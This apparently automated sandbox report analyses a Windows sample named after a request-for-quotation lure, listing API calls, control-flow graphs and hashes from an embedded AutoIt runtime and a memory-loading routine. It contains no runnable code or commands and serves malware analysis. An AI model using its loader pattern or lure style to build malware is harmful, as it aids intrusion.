                                                            • __lseeki64_nolock.LIBCMT ref: 007E618B
                                                            • __close_nolock.LIBCMT ref: 007E61EB
                                                              • Part of subcall function 007DEA9C: CloseHandle.KERNELBASE(00000000,0085EEF4,00000000,?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAEC
                                                              • Part of subcall function 007DEA9C: GetLastError.KERNEL32(?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAF6
                                                              • Part of subcall function 007DEA9C: __free_osfhnd.LIBCMT ref: 007DEB03
                                                              • Part of subcall function 007DEA9C: __dosmaperr.LIBCMT ref: 007DEB25
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            • __lseeki64_nolock.LIBCMT ref: 007E620D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E6342
                                                            • ___createFile.LIBCMT ref: 007E6361
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007E636E
                                                            • __dosmaperr.LIBCMT ref: 007E6375
                                                            • __free_osfhnd.LIBCMT ref: 007E6395
                                                            • __invoke_watson.LIBCMT ref: 007E63C3
                                                            • __wsopen_helper.LIBCMT ref: 007E63DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                            • String ID: @
                                                            • API String ID: 3896587723-2766056989
                                                            • Opcode ID: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
                                                            • Instruction ID: dc7267b31baab26e630fecd738297469d5f755df5abc678b776d46b2a8d926c0
                                                            • Opcode Fuzzy Hash: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
                                                            • Instruction Fuzzy Hash: A0226971A026899FEF299F69CC89BBD7B31FB18368F244229E5119B2D1D33D8D40C751

                                                            Control-flow Graph

                                                            APIs
                                                            • _wcscpy.LIBCMT ref: 007FFA96
                                                            • _wcschr.LIBCMT ref: 007FFAA4
                                                            • _wcscpy.LIBCMT ref: 007FFABB
                                                            • _wcscat.LIBCMT ref: 007FFACA
                                                            • _wcscat.LIBCMT ref: 007FFAE8
                                                            • _wcscpy.LIBCMT ref: 007FFB09
                                                            • __wsplitpath.LIBCMT ref: 007FFBE6
                                                            • _wcscpy.LIBCMT ref: 007FFC0B
                                                            • _wcscpy.LIBCMT ref: 007FFC1D
                                                            • _wcscpy.LIBCMT ref: 007FFC32
                                                            • _wcscat.LIBCMT ref: 007FFC47
                                                            • _wcscat.LIBCMT ref: 007FFC59
                                                            • _wcscat.LIBCMT ref: 007FFC6E
                                                              • Part of subcall function 007FBFA4: _wcscmp.LIBCMT ref: 007FC03E
                                                              • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC083
                                                              • Part of subcall function 007FBFA4: _wcscpy.LIBCMT ref: 007FC096
                                                              • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0A9
                                                              • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC0CE
                                                              • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0E4
                                                              • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                            • API String ID: 2955681530-2806939583
                                                            • Opcode ID: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
                                                            • Instruction ID: e872f852aa8455b82dcc29ce04eecb2b0fa04a7ea96f79bdebecc1fa59115764
                                                            • Opcode Fuzzy Hash: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
                                                            • Instruction Fuzzy Hash: 1591A271504309EFDB20EB64C855FAAB3E9BF54310F044869FA5997392DF38E944CB92

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                            • RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                            • LoadIconW.USER32(000000A9), ref: 007B4004
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                            • Instruction ID: 0863aeaf8b2e7e42d9d35c5decef6093e90a86b7c93e1c9a0b3a349e16a5cd95
                                                            • Opcode Fuzzy Hash: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                            • Instruction Fuzzy Hash: AD21C4B5914318AFDF00DFA8EC8DBCDBBB4FB18710F04461AF625A66A4D7B485848F91

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 007FBDB4: __time64.LIBCMT ref: 007FBDBE
                                                              • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
                                                            • __wsplitpath.LIBCMT ref: 007FC083
                                                              • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                            • _wcscpy.LIBCMT ref: 007FC096
                                                            • _wcscat.LIBCMT ref: 007FC0A9
                                                            • __wsplitpath.LIBCMT ref: 007FC0CE
                                                            • _wcscat.LIBCMT ref: 007FC0E4
                                                            • _wcscat.LIBCMT ref: 007FC0F7
                                                            • _wcscmp.LIBCMT ref: 007FC03E
                                                              • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
                                                              • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC2A1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC338
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC34E
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC35F
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC371
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                            • String ID:
                                                            • API String ID: 2378138488-0
                                                            • Opcode ID: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
                                                            • Instruction ID: 0f5be081a1bbdb942ac7b3d77635987151cca2fa6b4d79269bcf80abece1926f
                                                            • Opcode Fuzzy Hash: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
                                                            • Instruction Fuzzy Hash: 89C11AB1A0021DEADF15DFA4CD85EEEB7BDEF49310F0040AAF609E6251DB749A448F61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 957 7b3742-7b3762 959 7b37c2-7b37c4 957->959 960 7b3764-7b3767 957->960 959->960 961 7b37c6 959->961 962 7b3769-7b3770 960->962 963 7b37c8 960->963 964 7b37ab-7b37b3 DefWindowProcW 961->964 967 7b382c-7b3834 PostQuitMessage 962->967 968 7b3776-7b377b 962->968 965 821e00-821e2e call 7b2ff6 call 7ce312 963->965 966 7b37ce-7b37d1 963->966 970 7b37b9-7b37bf 964->970 1000 821e33-821e3a 965->1000 971 7b37d3-7b37d4 966->971 972 7b37f6-7b381d SetTimer RegisterWindowMessageW 966->972 969 7b37f2-7b37f4 967->969 974 821e88-821e9c call 7f4ddd 968->974 975 7b3781-7b3783 968->975 969->970 977 821da3-821da6 971->977 978 7b37da-7b37ed KillTimer call 7b3847 call 7b390f 971->978 972->969 980 7b381f-7b382a CreatePopupMenu 972->980 974->969 994 821ea2 974->994 981 7b3789-7b378e 975->981 982 7b3836-7b3840 call 7ceb83 975->982 987 821da8-821daa 977->987 988 821ddc-821dfb MoveWindow 977->988 978->969 980->969 983 821e6d-821e74 981->983 984 7b3794-7b3799 981->984 995 7b3845 982->995 983->964 999 821e7a-821e83 call 7ea5f3 983->999 992 7b379f-7b37a5 984->992 993 821e58-821e68 call 7f55bd 984->993 996 821dcb-821dd7 SetFocus 987->996 997 821dac-821daf 987->997 988->969 992->964 992->1000 993->969 994->964 995->969 996->969 997->992 1001 821db5-821dc6 call 7b2ff6 997->1001 999->964 1000->964 1005 821e40-821e53 call 7b3847 call 7b4ffc 1000->1005 1001->969 1005->964
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 007B37B3
                                                            • KillTimer.USER32(?,00000001), ref: 007B37DD
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B3800
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B380B
                                                            • CreatePopupMenu.USER32 ref: 007B381F
                                                            • PostQuitMessage.USER32(00000000), ref: 007B382E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                            • Instruction ID: 83da1a58794f6b80ac6675185dae2f23ee1d447875d85e18a940ad2312e14456
                                                            • Opcode Fuzzy Hash: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                            • Instruction Fuzzy Hash: 2A4125F5200295ABDF145F6CAC8EFFA3695FB50340F100129FA26D25A5DF68DED08762

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                            • LoadIconW.USER32(00000063), ref: 007B3E9E
                                                            • LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                            • LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                              • Part of subcall function 007B4024: LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                            • RegisterClassExW.USER32(?), ref: 007B3F30
                                                              • Part of subcall function 007B3F53: GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                              • Part of subcall function 007B3F53: RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                              • Part of subcall function 007B3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                              • Part of subcall function 007B3F53: InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                              • Part of subcall function 007B3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                              • Part of subcall function 007B3F53: LoadIconW.USER32(000000A9), ref: 007B4004
                                                              • Part of subcall function 007B3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                            • Instruction ID: b947d357813711ffbb6499721bbe149bb5f59fd0e5e56afc3e4db6694ec93308
                                                            • Opcode Fuzzy Hash: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                            • Instruction Fuzzy Hash: 862156B0E00304ABCF10DFADEC4DA99BBF5FB44314F10452AE208A66A4D7758680DFA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1021 7dacb3-7dace0 call 7d6ac0 call 7d7cf4 call 7d6986 1028 7dacfd-7dad02 1021->1028 1029 7dace2-7dacf8 call 7de880 1021->1029 1031 7dad08-7dad0f 1028->1031 1037 7daf52-7daf57 call 7d6b05 1029->1037 1033 7dad11-7dad40 1031->1033 1034 7dad42-7dad51 GetStartupInfoW 1031->1034 1033->1031 1035 7dad57-7dad5c 1034->1035 1036 7dae80-7dae86 1034->1036 1035->1036 1038 7dad62-7dad79 1035->1038 1039 7dae8c-7dae9d 1036->1039 1040 7daf44-7daf50 call 7daf58 1036->1040 1043 7dad7b-7dad7d 1038->1043 1044 7dad80-7dad83 1038->1044 1045 7dae9f-7daea2 1039->1045 1046 7daeb2-7daeb8 1039->1046 1040->1037 1043->1044 1048 7dad86-7dad8c 1044->1048 1045->1046 1049 7daea4-7daead 1045->1049 1050 7daebf-7daec6 1046->1050 1051 7daeba-7daebd 1046->1051 1053 7dadae-7dadb6 1048->1053 1054 7dad8e-7dad9f call 7d6986 1048->1054 1055 7daf3e-7daf3f 1049->1055 1056 7daec9-7daed5 GetStdHandle 1050->1056 1051->1056 1060 7dadb9-7dadbb 1053->1060 1066 7dada5-7dadab 1054->1066 1067 7dae33-7dae3a 1054->1067 1055->1036 1057 7daf1c-7daf32 1056->1057 1058 7daed7-7daed9 1056->1058 1057->1055 1063 7daf34-7daf37 1057->1063 1058->1057 1061 7daedb-7daee4 GetFileType 1058->1061 1060->1036 1064 7dadc1-7dadc6 1060->1064 1061->1057 1065 7daee6-7daef0 1061->1065 1063->1055 1068 7dadc8-7dadcb 1064->1068 1069 7dae20-7dae31 1064->1069 1070 7daefa-7daefd 1065->1070 1071 7daef2-7daef8 1065->1071 1066->1053 1072 7dae40-7dae4e 1067->1072 1068->1069 1073 7dadcd-7dadd1 1068->1073 1069->1060 1075 7daeff-7daf03 1070->1075 1076 7daf08-7daf1a InitializeCriticalSectionAndSpinCount 1070->1076 1074 7daf05 1071->1074 1077 7dae74-7dae7b 1072->1077 1078 7dae50-7dae72 1072->1078 1073->1069 1079 7dadd3-7dadd5 1073->1079 1074->1076 1075->1074 1076->1055 1077->1048 1078->1072 1080 7dade5-7dae1a InitializeCriticalSectionAndSpinCount 1079->1080 1081 7dadd7-7dade3 GetFileType 1079->1081 1082 7dae1d 1080->1082 1081->1080 1081->1082 1082->1069
                                                            APIs
                                                            • __lock.LIBCMT ref: 007DACC1
                                                              • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                              • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                            • __calloc_crt.LIBCMT ref: 007DACD2
                                                              • Part of subcall function 007D6986: __calloc_impl.LIBCMT ref: 007D6995
                                                              • Part of subcall function 007D6986: Sleep.KERNEL32(00000000,000003BC,007CF507,?,0000000E), ref: 007D69AC
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 007DACED
                                                            • GetStartupInfoW.KERNEL32(?,00866E28,00000064,007D5E91,00866C70,00000014), ref: 007DAD46
                                                            • __calloc_crt.LIBCMT ref: 007DAD91
                                                            • GetFileType.KERNEL32(00000001), ref: 007DADD8
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 007DAE11
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 1426640281-0
                                                            • Opcode ID: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                            • Instruction ID: d79b39d5362cd9259cb48fcd656f70bb5b52a2eaae6aa08e0a3aaf36c70c8ab9
                                                            • Opcode Fuzzy Hash: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                            • Instruction Fuzzy Hash: 4681D2B1905345DFDB14CF68C8856A9BBF0BF45320B24426EE4AAAB3D1D738D842CB56

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1083 149c8b0-149c95e call 149a2b0 1086 149c965-149c98b call 149d7c0 CreateFileW 1083->1086 1089 149c98d 1086->1089 1090 149c992-149c9a2 1086->1090 1091 149cadd-149cae1 1089->1091 1095 149c9a9-149c9c3 VirtualAlloc 1090->1095 1096 149c9a4 1090->1096 1093 149cb23-149cb26 1091->1093 1094 149cae3-149cae7 1091->1094 1097 149cb29-149cb30 1093->1097 1098 149cae9-149caec 1094->1098 1099 149caf3-149caf7 1094->1099 1100 149c9ca-149c9e1 ReadFile 1095->1100 1101 149c9c5 1095->1101 1096->1091 1102 149cb32-149cb3d 1097->1102 1103 149cb85-149cb9a 1097->1103 1098->1099 1104 149caf9-149cb03 1099->1104 1105 149cb07-149cb0b 1099->1105 1110 149c9e8-149ca28 VirtualAlloc 1100->1110 1111 149c9e3 1100->1111 1101->1091 1112 149cb3f 1102->1112 1113 149cb41-149cb4d 1102->1113 1106 149cbaa-149cbb2 1103->1106 1107 149cb9c-149cba7 VirtualFree 1103->1107 1104->1105 1108 149cb1b 1105->1108 1109 149cb0d-149cb17 1105->1109 1107->1106 1108->1093 1109->1108 1114 149ca2a 1110->1114 1115 149ca2f-149ca4a call 149da10 1110->1115 1111->1091 1112->1103 1116 149cb4f-149cb5f 1113->1116 1117 149cb61-149cb6d 1113->1117 1114->1091 1123 149ca55-149ca5f 1115->1123 1119 149cb83 1116->1119 1120 149cb7a-149cb80 1117->1120 1121 149cb6f-149cb78 1117->1121 1119->1097 1120->1119 1121->1119 1124 149ca61-149ca90 call 149da10 1123->1124 1125 149ca92-149caa6 call 149d820 1123->1125 1124->1123 1131 149caa8 1125->1131 1132 149caaa-149caae 1125->1132 1131->1091 1133 149caba-149cabe 1132->1133 1134 149cab0-149cab4 CloseHandle 1132->1134 1135 149cace-149cad7 1133->1135 1136 149cac0-149cacb VirtualFree 1133->1136 1134->1133 1135->1086 1135->1091 1136->1135
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0149C981
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0149CBA7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1291150986.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_149a000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction ID: cc017eec1d5b1976299f5f7d30519dfeb7a785d0831a06fb7e3bf2c0b7c1e038
                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction Fuzzy Hash: CAA10A74E00209EBEF14CFA4C994BEEBBB5FF48304F10815AE505BB291D7799A41CB94

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1192 7b49fb-7b4a25 call 7bbcce RegOpenKeyExW 1195 7b4a2b-7b4a2f 1192->1195 1196 8241cc-8241e3 RegQueryValueExW 1192->1196 1197 824246-82424f RegCloseKey 1196->1197 1198 8241e5-824222 call 7cf4ea call 7b47b7 RegQueryValueExW 1196->1198 1203 824224-82423b call 7b6a63 1198->1203 1204 82423d-824245 call 7b47e2 1198->1204 1203->1204 1204->1197
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008241DB
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0082421A
                                                            • RegCloseKey.ADVAPI32(?), ref: 00824249
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                            • API String ID: 1586453840-614718249
                                                            • Opcode ID: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                            • Instruction ID: eb6e12ceb9ee71b4df71bddc846573dd9ed998a32751bfac295a8a640309b55a
                                                            • Opcode Fuzzy Hash: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                            • Instruction Fuzzy Hash: 43116D71600208FEEB04ABA4DD9AEEF7BACFF04744F004458B502E6191EA749E41D760

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1219 7b36b8-7b3728 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                            • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                            • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
